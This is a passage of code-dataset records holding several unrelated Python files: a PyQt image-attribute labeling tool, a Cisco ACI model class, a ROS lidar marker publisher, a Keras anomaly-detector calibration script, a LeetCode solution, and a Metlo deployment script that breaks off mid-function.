self.face_layput.addWidget(face)\n\n for i in self.face_attri:\n group = QGroupBox()\n # group.setTitle(i)\n flayer = QHBoxLayout(group)\n button1 = QRadioButton('1')\n button2 = QRadioButton('2')\n button1.setChecked(True)\n\n button1.setObjectName(\"{}_1\".format(i))\n button2.setObjectName(\"{}_2\".format(i))\n button1.toggled.connect(self.toogle_deal)\n button2.toggled.connect(self.toogle_deal)\n\n flayer.addWidget(QLabel(i))\n flayer.addStretch()\n flayer.addWidget(button1)\n flayer.addWidget(button2)\n flayer.setAlignment(Qt.AlignRight)\n self.face_layput.addWidget(group)\n\n self.huamn_attri_buttons.append(button1)\n self.huamn_attri_buttons.append(button2)\n\n self.huamn_layput = QVBoxLayout()\n self.huamn_layput.addWidget(human)\n\n for j in self.huamn_attri:\n group = QGroupBox()\n # group.setTitle(j)\n hlayer = QHBoxLayout(group)\n hbutton1 = QRadioButton('1')\n hbutton2 = QRadioButton('2')\n hbutton1.setChecked(True)\n\n hbutton1.setObjectName(\"{}_1\".format(j))\n hbutton2.setObjectName(\"{}_2\".format(j))\n\n hbutton1.toggled.connect(self.toogle_deal)\n hbutton2.toggled.connect(self.toogle_deal)\n\n hlayer.addWidget(QLabel(j))\n hlayer.addStretch()\n hlayer.addWidget(hbutton1)\n hlayer.addWidget(hbutton2)\n hlayer.setAlignment(Qt.AlignRight)\n self.huamn_layput.addWidget(group)\n\n self.huamn_attri_buttons.append(hbutton1)\n self.huamn_attri_buttons.append(hbutton2)\n\n self.mainlayout = QVBoxLayout(self)\n\n self.mainlayout.addLayout(self.face_layput)\n 
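# fixed spacer keeps the face-attribute panel visually separate from the body-attribute panel below\n        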
self.mainlayout.addSpacing(30)\n self.mainlayout.addLayout(self.huamn_layput)\n\n timer = QTimer(self)\n timer.setInterval(20)\n timer.timeout.connect(self.timerEven)\n timer.start(20)\n\n def timerEven(self):\n self.updates()\n\n def updates(self):\n for i in range(label_item_len):\n if statue[i] == False:\n self.huamn_attri_buttons[i * 2].setChecked(True)\n else:\n self.huamn_attri_buttons[i * 2+1].setChecked(True)\n\n\n def toogle_deal(self):\n sender, num = self.sender().objectName().split('_')\n\n if num == '1':\n index = self.sum_attribute.index(sender)\n if self.huamn_attri_buttons[index*2].isChecked() == True:\n statue[index] = False\n else:\n statue[index] = True\n\n\nclass Labelattr(QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.points = [QPoint(0, 0)]\n self.coordinates = []\n self.attri = []\n self.clickbox = 0\n self.initUI()\n\n def change_coordinate_display(self, coor):\n self.coordinates.clear()\n self.attri.clear()\n self.img_size = coor['size']\n self.widget_size = self.size()\n for instance in coor['coor']:\n instance_coor = []\n for box in instance:\n xmin = box[0] * (self.widget_size.width() / self.img_size[0])\n ymin = box[1] * (self.widget_size.height() / self.img_size[1])\n xmax = box[2] * (self.widget_size.width() / self.img_size[0])\n ymax = box[3] * (self.widget_size.height() / self.img_size[1])\n instance_coor.append((QPoint(xmin, ymin), QPoint(xmax, ymax)))\n self.coordinates.append((instance_coor[0], instance_coor[1]))\n self.attri.append([False for i in range(11)])\n self.update()\n\n def initUI(self):\n self.setMinimumSize(1000, 800)\n self.img = QImage(cvtColor(resize(imread(\"./icons/logo.jpg\"), (1000, 800)), COLOR_BGR2RGB), 1000, 800, QImage.Format_RGB888)\n self.counter=0\n\n def update_display(self, filename):\n self.img = QImage(cvtColor(resize(imread(filename), (1000, 800)), COLOR_BGR2RGB), 1000, 800, QImage.Format_RGB888)\n self.update()\n\n def timer_event(self):\n # self.show()\n self.counter = self.counter+1\n\n\n def paintEvent(self, event):\n\n qp = QPainter()\n qp.begin(self)\n self.drawPoints(qp)\n qp.end()\n\n\n def drawPoints(self, qp):\n color = [Qt.red, Qt.green, Qt.blue, Qt.yellow]\n qp.drawImage(QRect(0, 0, 1000, 800), self.img)\n\n qp.setBrush(QBrush(Qt.black, Qt.BDiagPattern))\n\n for item1, coordinate in enumerate(self.coordinates):\n qp.setPen(color[item1%4])\n for item2, coor in enumerate(coordinate):\n qp.drawRect(QRect(coor[0], coor[1]))\n\n if len(self.coordinates) >=1:\n for coor in self.coordinates[self.clickbox]:\n qp.setPen(color[self.clickbox % 4])\n qp.setBrush(QBrush(Qt.green, Qt.BDiagPattern))\n qp.drawRect(QRect(coor[0], coor[1]))\n\n if len(self.points) % 2 == 0:\n qp.drawRect(QRect(self.points[-1], self.points[0]))\n\n def mousePressEvent(self, mousePress_even):\n pos = mousePress_even.pos()\n candidate = []\n global statue\n\n self.attri[self.clickbox] = statue\n for item1, coordinate in enumerate(self.coordinates):\n if coordinate[1][0].x() < pos.x() and coordinate[1][0].y() < pos.y() and \\\n coordinate[1][1].x()>pos.x() and coordinate[1][1].y()>pos.y():\n candidate.append(item1)\n break\n if len(candidate) == 0:\n return\n\n self.clickbox = candidate[0]\n statue = self.attri[self.clickbox]\n print(statue)\n print()\n self.update()\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n self.cwd = os.getcwd()\n self.Image_list = []\n self.saveDirectory = \"./Annotations\"\n\n\n def Label_load_xml(self, filename):\n 
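\"\"\"Show the image on the canvas, then pair each annotated 'head' box with an enclosing 'human' box (compute_iou > 0.85 and top edges within 50 px) before drawing.\"\"\"\n        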
self.display.update_display(filename)\n label = Label_get_instance(os.path.splitext(filename)[0]+'.xml')\n faces = []\n bodys_t = []\n bodys = []\n for instance in label['instance']:\n if instance['name'] == 'head':\n faces.append(instance['bndbox'])\n elif instance['name'] == 'human':\n bodys_t.append(instance['bndbox'])\n else:\n print(\"label type unknow\")\n exit()\n for item, face in enumerate(faces):\n for body_t in bodys_t:\n if compute_iou(face, body_t)>0.85 and abs(body_t[1]- face[1]) < 50:\n bodys.append(body_t)\n break\n self.coor = list(zip(faces, bodys))\n\n self.display.change_coordinate_display({\"size\":label['size'], \"coor\":self.coor})\n\n def Label_save_xml(self):\n attri = self.display.attri\n box = self.display.coordinates\n size =self.display.img_size\n\n imgpath = os.path.join(self.ImagefilesDirectort, self.filelistwidget.currentItem().text())\n instances = zip(self.coor, attri)\n save_dir = os.path.join(self.saveDirectory, self.filelistwidget.currentItem().text().split('.')[0]+'.xml')\n Label_write_instance(imgpath, size, instances, save_dir)\n\n\n def initUI(self):\n openbutton = QPushButton(\"Open\", )\n openbutton.setIcon(QIcon(\"icons/open.png\"))\n openbutton.setMinimumSize(80, 80)\n\n opendbutton = QPushButton(\"Open Dir\")\n opendbutton.setIcon(QIcon(\"icons/open.png\"))\n opendbutton.setMinimumSize(80, 80)\n\n savebutton = QPushButton(\"Save\")\n savebutton.setIcon(QIcon(\"icons/save.png\"))\n savebutton.setMinimumSize(80, 80)\n\n saveasbutton = QPushButton(\"Save as\")\n saveasbutton.setIcon(QIcon(\"icons/save.png\"))\n saveasbutton.setMinimumSize(80, 80)\n\n nextbutton = QPushButton(\"next\")\n nextbutton.setIcon(QIcon(\"icons/next.png\"))\n nextbutton.setMinimumSize(80, 80)\n\n prebutton = QPushButton(\"pre\")\n prebutton.setIcon(QIcon(\"icons/prev.png\"))\n prebutton.setMinimumSize(80, 80)\n\n openbutton.clicked.connect(self.MessageClicked)\n opendbutton.clicked.connect(self.MessageClicked)\n savebutton.clicked.connect(self.MessageClicked)\n nextbutton.clicked.connect(self.MessageClicked)\n prebutton.clicked.connect(self.MessageClicked)\n\n toolhbox = QVBoxLayout()\n toolhbox.addWidget(openbutton)\n toolhbox.addWidget(opendbutton)\n toolhbox.addWidget(savebutton)\n toolhbox.addWidget(saveasbutton)\n\n toolhbox.addWidget(nextbutton)\n toolhbox.addWidget(prebutton)\n\n\n mydraw = QVBoxLayout()\n self.display = Labelattr()\n mydraw.addWidget(self.display)\n self.filelistwidget = QListWidget()\n self.filelistwidget.doubleClicked.connect(self.list_doubleclick)\n\n self.myradio = human_attrition_ui()\n\n mainlayout = QHBoxLayout(self)\n\n mainlayout.addLayout(toolhbox)\n mainlayout.addLayout(mydraw)\n mainlayout.addWidget(self.myradio)\n mainlayout.addWidget(self.filelistwidget)\n\n self.setLayout(mainlayout)\n\n # self.setGeometry(200, 200, 1000, 800)\n self.setWindowTitle(\"Labelattri\")\n self.setWindowIcon(QIcon(\"./icons/huaji.png\"))\n\n\n\n# 消息框处理队列\n def MessageClicked(self, event):\n sender = self.sender()\n message_type = sender.text()\n Support_image_format = [\"bmp\",\"jpg\", \"jpeg\", \"png\", \"tif\"]\n if message_type == \"Open\":\n filename, filetype = QFileDialog.getOpenFileName(self,\n \"Image file\",\n self.cwd,\n \"Image Files(*.bmp *.jpg *.jpeg *.png *.tif)\"\n )\n # self.display.update_display(filename)\n\n elif message_type == \"Open Dir\":\n self.ImagefilesDirectort = QFileDialog.getExistingDirectory(self,\n \"Image files\",\n self.cwd\n )\n self.Image_list.clear()\n self.filelistwidget.clear()\n for file in 
os.listdir(self.ImagefilesDirectort):\n if file.split('.')[-1] in Support_image_format:\n self.Image_list.append(file)\n self.filelistwidget.addItem(file)\n self.Label_load_xml(os.path.join(self.ImagefilesDirectort, self.Image_list[0]))\n\n elif message_type == \"Save\":\n # self.saveDirectory = QFileDialog.getSaveFileName(self,\n # 'Save as',\n # self.cwd,\n # \"Label Files(*.txt *.json *.xml )\"\n #\n # )\n self.Label_save_xml()\n elif message_type == \"Save as\":\n self.saveDirectory = QFileDialog.getSaveFileName(self,\n 'Save as',\n self.cwd,\n \"Label Files(*.txt *.json *.xml )\"\n )\n elif message_type == \"next\":\n self.Label_load_xml(os.path.join(self.ImagefilesDirectort, self.Image_list[0]))\n\n # elif message_type == \"pre\":\n\n\n def list_doubleclick(self):\n self.Label_load_xml(os.path.join(self.ImagefilesDirectort, self.filelistwidget.currentItem().text()))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n labeltool = MainWindow()\n labeltool.show()\n # print(labeltool.size())\n sys.exit(app.exec_())\n\n# ui转py\n# 1\n# python -m PyQt5.uic.pyuic demo.ui -o demo.py\n\n\n\n\n","repo_name":"JunjieZhouwust/Labelattri","sub_path":"labelattri.py","file_name":"labelattri.py","file_ext":"py","file_size_in_byte":13573,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"24739872098","text":"from cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass Route(Mo):\n \"\"\"\n Mo doc not defined in techpub!!!\n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.fabrgm.Route\")\n\n meta.moClassName = \"fabrgmRoute\"\n meta.rnFormat = \"src-[%(src)s]-grp-[%(grp)s]\"\n meta.category = MoCategory.REGULAR\n meta.label = \"Fabric Group Manager mroute\"\n meta.writeAccessMask = 0x8008020040001\n meta.readAccessMask = 0x8008020040001\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.parentClasses.add(\"cobra.model.fabrgm.Db\")\n\n meta.superClasses.add(\"cobra.model.nw.Conn\")\n meta.superClasses.add(\"cobra.model.nw.Item\")\n meta.superClasses.add(\"cobra.model.nw.DbRec\")\n meta.superClasses.add(\"cobra.model.l3.DbRec\")\n meta.superClasses.add(\"cobra.model.nw.GEp\")\n\n meta.rnPrefixes = [\n ('src-', True),\n ('-grp-', True),\n ]\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"ffLoser\", \"ffLoser\", 54647, PropCategory.REGULAR)\n prop.label = \"MRIB flag: 
Fabric Forwarder Loser\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"ffLoser\", prop)\n\n prop = PropMeta(\"str\", \"grp\", \"grp\", 54642, PropCategory.REGULAR)\n prop.label = \"Group Address\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"grp\", prop)\n\n prop = PropMeta(\"str\", \"installedToMrib\", \"installedToMrib\", 54646, PropCategory.REGULAR)\n prop.label = \"MRIB flag: Installed to MRIB\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"installedToMrib\", prop)\n\n prop = PropMeta(\"str\", \"local\", \"local\", 54643, PropCategory.REGULAR)\n prop.label = \"COOP flag: Local Interest\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"local\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"name\", \"name\", 16437, PropCategory.REGULAR)\n prop.label = \"Name\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 128)]\n meta.props.add(\"name\", prop)\n\n prop = PropMeta(\"str\", \"remote\", \"remote\", 54644, PropCategory.REGULAR)\n prop.label = \"COOP flag: Remote Interest\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"remote\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"src\", \"src\", 54641, PropCategory.REGULAR)\n prop.label = \"Source Address\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"src\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n prop = PropMeta(\"str\", \"stripeWinner\", \"stripeWinner\", 54645, PropCategory.REGULAR)\n prop.label = \"COOP flag: Stripe Winner\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"stripeWinner\", prop)\n\n meta.namingProps.append(getattr(meta.props, \"src\"))\n getattr(meta.props, \"src\").needDelimiter = True\n meta.namingProps.append(getattr(meta.props, \"grp\"))\n getattr(meta.props, \"grp\").needDelimiter = True\n\n def __init__(self, parentMoOrDn, src, grp, markDirty=True, **creationProps):\n namingVals = [src, grp]\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# 
##################################################\n","repo_name":"pws1453/devasc-notes","sub_path":"python-api-practice/aci/lib/python3.10/site-packages/cobra/modelimpl/fabrgm/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74046974568","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom std_msgs.msg import String,Header\nfrom sensor_msgs.msg import LaserScan\nfrom sensor_msgs.msg import PointCloud2,PointField\nfrom sensor_msgs import point_cloud2\nfrom visualization_msgs.msg import Marker,MarkerArray\nimport math\nglobal publisher\nglobal Array_Near\nglobal Array_Medium\nglobal Array_Far\nglobal MARKERS_MAX_NEAR\nglobal MARKERS_MAX_MEDIUM\nglobal MARKERS_MAX_FAR\n\n\n\ndef messageReceivedCallback(message):\n global pub\n global Array_Near\n global Array_Medium\n global Array_Far\n global MARKERS_MAX_NEAR\n global MARKERS_MAX_MEDIUM\n global MARKERS_MAX_FAR\n Array_Near = MarkerArray()\n Array_Medium = MarkerArray()\n Array_Far = MarkerArray()\n global publisher\n\n angle = message.angle_min\n #List that will contain all [x,y,z] coordinates\n cloud_data_near = []\n cloud_data_medium = []\n cloud_data_far = []\n\n for radius in message.ranges:\n x = radius * math.cos(angle)\n y = radius * math.sin(angle)\n z = 0\n point = (x,y,z)\n\n if radius > 0 and radius < 5:\n cloud_data_near.append(point)\n elif radius > 5 and radius < 10:\n cloud_data_medium.append(point)\n else:\n cloud_data_far.append(point)\n\n angle += message.angle_increment\n\n count_near=0\n count_medium=0\n count_far=0\n for i in range(0,len(cloud_data_near)):\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n marker.header.frame_id = \"/left_laser\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.ns = 'sphere_near'\n marker.scale.x = 0.2\n marker.scale.y = 0.2\n marker.scale.z = 0.2\n marker.color.a = 0.5\n marker.color.r = 0\n marker.color.g = 1\n marker.color.b = 0\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.position.x = cloud_data_near[i][0]\n marker.pose.position.y = cloud_data_near[i][1]\n marker.pose.position.z = cloud_data_near[i][2]\n\n if (count_near > MARKERS_MAX_NEAR):\n #Array_Near.markers.pop(0)\n Array_Near=MarkerArray()\n\n\n Array_Near.markers.append(marker)\n id = 0\n for m in Array_Near.markers:\n m.id = id\n\n id += 1\n #publisher.publish(marker)\n publisher.publish(Array_Near)\n count_near+=1\n\n\n for i in range(0,len(cloud_data_medium)):\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n marker.header.frame_id = \"/left_laser\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.ns = 'sphere_medium'\n marker.scale.x = 0.2\n marker.scale.y = 0.2\n marker.scale.z = 0.2\n marker.color.a = 0.5\n marker.color.r = 0\n marker.color.g = 0\n marker.color.b = 1\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.position.x = cloud_data_medium[i][0]\n marker.pose.position.y = cloud_data_medium[i][1]\n marker.pose.position.z = cloud_data_medium[i][2]\n\n if (count_medium > MARKERS_MAX_MEDIUM):\n Array_Medium.markers.pop(0)\n\n\n Array_Medium.markers.append(marker)\n id = 0\n for m in Array_Medium.markers:\n m.id = id\n\n id += 1\n #publisher.publish(marker)\n publisher.publish(Array_Medium)\n count_medium += 1\n\n for i in 
range(0,len(cloud_data_far)):\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n marker.header.frame_id = \"/left_laser\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.ns = 'sphere_far'\n marker.scale.x = 0.2\n marker.scale.y = 0.2\n marker.scale.z = 0.2\n marker.color.a = 0.5\n marker.color.r = 1\n marker.color.g = 0\n marker.color.b = 0\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.position.x = cloud_data_far[i][0]\n marker.pose.position.y = cloud_data_far[i][1]\n marker.pose.position.z = cloud_data_far[i][2]\n\n if (count_far > MARKERS_MAX_FAR):\n Array_Far.markers.pop(0)\n\n Array_Far.markers.append(marker)\n\n #publisher.publish(marker)\n publisher.publish(Array_Far)\n count_far += 1\n\n\n\n\n\ndef main():\n global publisher\n global Array_Near\n global MARKERS_MAX_NEAR\n global MARKERS_MAX_MEDIUM\n global MARKERS_MAX_FAR\n\n MARKERS_MAX_NEAR=700\n MARKERS_MAX_MEDIUM=700\n MARKERS_MAX_FAR = 700\n\n\n Array_Near = MarkerArray()\n\n topic_name_bag_file = 'left_laser/laserscan'\n\n rospy.init_node('lidar_subscriber', anonymous=False)\n rospy.Subscriber(topic_name_bag_file, LaserScan, messageReceivedCallback)\n publisher = rospy.Publisher('Marker_topic', MarkerArray, queue_size=100)\n rate = rospy.Rate(10) # 10hz\n\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DanielCoelho112/pari_2020","sub_path":"Parte10/pari_aula10/src/Ex9.py","file_name":"Ex9.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42678438482","text":"import cv2\nimport glob\nimport numpy as np\nimport scipy as sp\nfrom matplotlib import *\nfrom pylab import *\nimport time\nfrom keras.models import Model, model_from_json\nimport numpy as np\nfrom keras import backend as K\nimport tensorflow as tf\nimport os\nfrom sklearn.utils import shuffle\nfrom keras.models import model_from_json\nfrom sklearn.metrics import mean_squared_error\nimport csv\n\n\ndef load_model(model_path):\n with open(model_path + 'auto_model.json', 'r') as jfile:\n model_svdd = model_from_json(jfile.read())\n model_svdd.load_weights(model_path + 'auto_model.h5')\n return model_svdd\n\ndef mse(imageA, imageB):\n\t# the 'Mean Squared Error' between the two images is the\n\t# sum of the squared difference between the two images;\n\t# NOTE: the two images must have the same dimension\n\terr = np.sum((imageA.astype(\"float\") - imageB.astype(\"float\")) ** 2)\n\terr /= float(imageA.shape[0] * imageA.shape[1])\n\n\t# return the MSE, the lower the error, the more \"similar\"\n\t# the two images are\n\treturn err\n\n\n#Load complete input images without shuffling\ndef load_images(paths,calib_path):\n numImages = 0\n inputs = []\n comp_inp = []\n for path in paths:\n print(path)\n numFiles = len(glob.glob1(path,'*.png'))\n numImages += numFiles\n for img in glob.glob(path+'*.png'):\n img = cv2.imread(img)\n img = cv2.resize(img, (224, 224))\n #img = img / 255.\n inputs.append(img)\n #inpu = shuffle(inputs)\n #print(\"Total number of images:%d\" %(numImages))\n j=0\n for i in range(0,len(inputs),5):\n cv2.imwrite(calib_path + \"/frame%d.png\"%j,inputs[i])\n j+=1\n #comp_inp.append(calib_path+ \"/\",inputs[i])\n print(\"Total number of images:%d\" %j)\n # return inputs, comp_inp\n return inputs\n\ndef createFolderPaths(path,folders):\n paths = []\n for folder in folders:\n data_path = path + folder + '/'\n 
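# each entry becomes '<path><folder>/', which load_images later scans with glob\n        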
paths.append(data_path)\n return paths\n\ndef load_training_images(path,trainingFolders,calib_path):\n paths = createFolderPaths(path,trainingFolders)\n return load_images(paths,calib_path)\n\ndef load_calib_images(calib_path):\n numImages = 0\n inputs = []\n for img in glob.glob(calib_path+'*.png'):\n img = cv2.imread(img)\n img = cv2.resize(img, (224, 224))\n img = img / 255.\n inputs.append(img)\n #inpu = shuffle(inputs)\n print(\"Total number of images:%d\" %(numImages))\n return inputs\n\ndef calib_data_generation(model_vae,calib_path,model_path):\n calib_images = load_calib_images(calib_path)\n calib_images = np.array(calib_images)\n calib_images = np.reshape(calib_images, [-1, calib_images.shape[1],calib_images.shape[2],calib_images.shape[3]])\n for i in range(0,len(calib_images)):\n dist_val=[]\n img = np.array(calib_images[i])[np.newaxis]\n predicted_reps = model_vae.predict(img)\n dist = mse(predicted_reps, img)\n print(dist)\n dist_val.append(dist)\n with open(model_path + 'test-noon.csv', 'a') as file:\n writer = csv.writer(file)\n writer.writerow(dist_val)\n\nif __name__ == '__main__':\n path = \"/home/scope/Carla/autopilot_Carla_ad/sample_data/new-trial/\"\n # list of folders used in training\n trainingFolders = [\"clear_noon1\",\"clear_noon2\",\"cloudy_noon1\",\"cloudy_noon2\"]\n calib_path = \"/home/scope/Carla/autopilot_Carla_ad/sample_data/new-trial/clear_noon1/\"\n model_path = \"/home/scope/Carla/autopilot_Carla_ad/leaderboard/team_code/detector_code/new-trial-100/\"\n model_vae=load_model(model_path)\n calib_data_generation(model_vae,calib_path,model_path)\n","repo_name":"scope-lab-vu/Resonate","sub_path":"resonate-carla/leaderboard/team_code/detector_code/model-test.py","file_name":"model-test.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"28024039340","text":"class Solution:\n def climbStairs(self, n: int) -> int:\n if n == 1 or n== 2 :return n\n f1,f2=1,2\n for i in range(3,n+1):\n num=f1+f2\n f1=f2\n f2=num\n return num\n def climbStairs0(self, n: int) -> int:\n import math\n sqrt5=5**0.5\n fibin=math.pow((1+sqrt5)/2,n+1)-math.pow((1-sqrt5)/2,n+1)\n return int(fibin/sqrt5)\n\n","repo_name":"chen-gan-ga/pythonProject","sub_path":"leet-code/array/70爬楼梯.py","file_name":"70爬楼梯.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24735917837","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom base64 import b64encode\nimport secrets\nimport string\nimport subprocess\nimport os\nimport urllib.request\nfrom urllib.parse import quote\nfrom urllib.request import Request, urlopen\nimport json\nimport re\n\nMETLO_DEFAULT_DIR = \"/opt/metlo\"\n\nMETLO_DIR = os.environ.get(\"METLO_DIR\", METLO_DEFAULT_DIR)\nENV_PATH = os.path.join(METLO_DIR, \".env\")\nLICENSE_PATH = os.path.join(METLO_DIR, \"LICENSE_KEY\")\nFILES_TO_PULL = [\"docker-compose.yaml\", \"init.sql\", \"metlo-config.yaml\"]\nUPDATE_FILES_TO_PULL = [\"docker-compose.yaml\", \"init.sql\"]\nIMAGES = [\"backend\", \"frontend\", \"jobrunner\", \"attack-analyzer\"]\n\n\nclass DockerLogin(object):\n def __init__(self):\n pass\n\n def __enter__(self):\n with open(ENV_PATH) as f:\n license_keys = list(filter(lambda x: \"LICENSE_KEY\" in x, f.readlines()))\n if len(license_keys) == 0:\n raise Exception(\"No license key found\")\n license_key = license_keys[0]\n regex = r\"LICENSE_KEY=[\\'\\\"](.*)[\\'\\\"]\"\n 
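# the .env line looks like LICENSE_KEY='...' or LICENSE_KEY=\"...\"; group 1 captures the key itself\n            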
matches = re.findall(regex, license_key, re.MULTILINE)\n req = Request(\n f\"https://backend.metlo.com/license-key/docker?licenseKey={quote(matches[0])}\",\n method=\"GET\",\n )\n with urlopen(req) as resp:\n data = json.loads(resp.read())\n username = data[\"username\"]\n pwd = data[\"docker_token\"]\n subprocess.run(\n [\"docker\", \"login\", \"-u\", username, \"--password-stdin\"],\n input=pwd,\n universal_newlines=True,\n )\n\n def __exit__(self, *args, **kwargs):\n subprocess.run([\"docker\", \"logout\"])\n\n\ndef get_file(file_name):\n src = f\"https://raw.githubusercontent.com/metlo-labs/metlo-deploy/main/assets/{file_name}\"\n request = urllib.request.Request(src)\n with urllib.request.urlopen(request) as response:\n data = response.read().decode(\"utf-8\")\n with open(os.path.join(METLO_DIR, file_name), \"w\") as f:\n f.write(data)\n\n\ndef gen_secret(l):\n return \"\".join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase)\n for _ in range(l)\n )\n\n\ndef get_license_key(quiet):\n license = os.environ.get(\"LICENSE_KEY\")\n if license is None:\n if quiet:\n license = \"\"\n else:\n license = input(\"[Optional] Please enter your license key: \")\n return license\n\n\ndef write_env(quiet):\n encryption_key = b64encode(secrets.token_bytes(32)).decode(\"UTF-8\")\n express_secret = gen_secret(32)\n redis_password = gen_secret(16)\n license_key = get_license_key(quiet)\n jwt_key = b64encode(secrets.token_bytes(256)).decode(\"UTF-8\")\n init_env_file = f\"\"\"\nENCRYPTION_KEY=\"{encryption_key}\"\nEXPRESS_SECRET=\"{express_secret}\"\nREDIS_PASSWORD=\"{redis_password}\"\nNUM_WORKERS=2\nLICENSE_KEY=\"{license_key}\"\nJWT_KEY=\"{jwt_key}\"\n \"\"\".strip()\n with open(ENV_PATH, \"w\") as f:\n f.write(init_env_file)\n\n\ndef init_env(quiet=False):\n if os.path.exists(ENV_PATH):\n return\n print(\"Initializing Environment...\")\n write_env(quiet)\n\n\ndef pull_files():\n print(\"Pulling Files...\")\n for f in FILES_TO_PULL:\n get_file(f)\n\n\ndef update_files():\n print(\"Pulling Updated Files...\")\n for f in UPDATE_FILES_TO_PULL:\n get_file(f)\n\n\ndef pull_dockers():\n print(\"Pulling Docker Images...\")\n with DockerLogin():\n for e in IMAGES:\n subprocess.run([\"docker\", \"pull\", f\"metlo/enterprise-{e}\"])\n\n\ndef prune_docker():\n print(\"Pruning existing docker images\")\n subprocess.run([\"docker\", \"system\", \"prune\",\"-f\"])\n\n\ndef init(quiet=False):\n if not os.path.exists(METLO_DIR):\n os.mkdir(METLO_DIR)\n init_env(quiet)\n pull_files()\n pull_dockers()\n\n\ndef start():\n subprocess.run([\"docker-compose\", \"up\", \"-d\"], cwd=METLO_DIR)\n\n\ndef stop():\n subprocess.run([\"docker-compose\", 